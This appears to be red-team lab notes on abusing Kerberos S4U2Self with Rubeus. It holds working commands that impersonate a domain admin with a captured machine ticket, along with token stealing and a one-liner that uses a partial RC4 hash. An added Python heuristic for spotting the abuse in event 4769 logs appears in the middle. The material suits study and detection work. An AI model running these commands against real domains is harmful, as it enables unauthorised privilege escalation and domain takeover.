S4U2Self Abuse

Machine accounts do not get remote local admin access to their own host, so a captured machine TGT cannot be used directly for that.

What we can do instead is abuse S4U2Self to obtain a usable TGS as a user we know is a local admin (e.g. a domain admin). Rubeus has a /self flag for this purpose.

We will use the Domain Controller TGT captured through Unconstrained Delegation.

Abuse S4U2Self to obtain a usable TGS as a user who we know is a local admin

Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

[+] ProcessID       : 3608
steal_token 3608
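From the defender's side, the request above reaches the DC as an S4U2Self exchange: the machine account asks for a service ticket to its own SPN on behalf of nlamb, and only the client-side /altservice rewrite turns that into a CIFS ticket. The Kerberos service ticket request event (Windows Security event 4769) therefore shows a privileged user, a computer account as the service name, and a client address that is not the computer's own. The following heuristic is an added example, not part of the original page or of Rubeus; the sample 4769 events, the privileged-user list and the host inventory are constructed assumptions for illustration.

```python
"""Heuristic triage of Kerberos service ticket requests (event 4769) for
S4U2Self-style abuse. Added example; the events, watch-list and inventory
below are constructed, not real telemetry."""
from dataclasses import dataclass

# Constructed sample 4769 events (subset of fields), assumption for illustration.
SAMPLE_4769 = [
    {"account": "nlamb@DEV.CYBERBOTIC.IO", "service": "DC-2$",
     "client": "10.10.17.25", "enc": "0x12"},   # privileged user, DC SPN, foreign address
    {"account": "jking@DEV.CYBERBOTIC.IO", "service": "WEB$",
     "client": "10.10.17.50", "enc": "0x12"},   # ordinary user, host's own address
    {"account": "DC-2$@DEV.CYBERBOTIC.IO", "service": "krbtgt",
     "client": "10.10.15.20", "enc": "0x12"},   # not a computer-account service
]

# Assumed watch-lists: users known to be local admins on sensitive hosts, and
# the addresses from which each computer account is expected to talk to the DC.
PRIVILEGED_USERS = {"nlamb"}
HOST_INVENTORY = {"DC-2$": {"10.10.15.20"}, "WEB$": {"10.10.17.50"}}

# RC4-HMAC; a service ticket with this etype is a weaker-crypto signal worth noting.
RC4_ETYPE = "0x17"


@dataclass
class Finding:
    account: str
    service: str
    client: str
    reasons: list


def is_computer_account(name: str) -> bool:
    """Computer (machine) accounts end in '$' in the sAMAccountName form."""
    return name.upper().endswith("$")


def triage_4769(events, privileged=PRIVILEGED_USERS, inventory=HOST_INVENTORY):
    """Return one Finding per event where a privileged user obtains a service
    ticket for a computer account's own SPN from an unexpected client address.
    Only events whose Service Name is a computer account are considered."""
    findings = []
    for ev in events:
        user = ev["account"].split("@", 1)[0].lower()
        service = ev["service"].upper()
        if not is_computer_account(service):
            continue
        reasons = []
        expected = inventory.get(service, set())
        if user in {p.lower() for p in privileged} and ev["client"] not in expected:
            reasons.append("privileged user requested host's own SPN from foreign address")
        if ev.get("enc") == RC4_ETYPE:
            reasons.append("RC4 service ticket")
        if reasons:
            findings.append(Finding(ev["account"], ev["service"], ev["client"], reasons))
    return findings


if __name__ == "__main__":
    for f in triage_4769(SAMPLE_4769):
        print(f"{f.account} -> {f.service} from {f.client}: {', '.join(f.reasons)}")
```

The inventory lookup is the part that needs real data: a host requesting a ticket to its own SPN from its own address is normal noise, so the heuristic only fires when the requesting address is not one the computer account is expected to use.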

Example one-liner

Rubeus.exe s4u /domain:ZSM.LOCAL /impersonateuser:Administrator /self /altservice:cifs/ZPH-SVRMGMT1.ZSM.LOCAL /dc:192.168.210.10 /user:ZPH-SVRMGMT1$ /rc4:89d0b5687...ad336a77b8ef2f /ptt
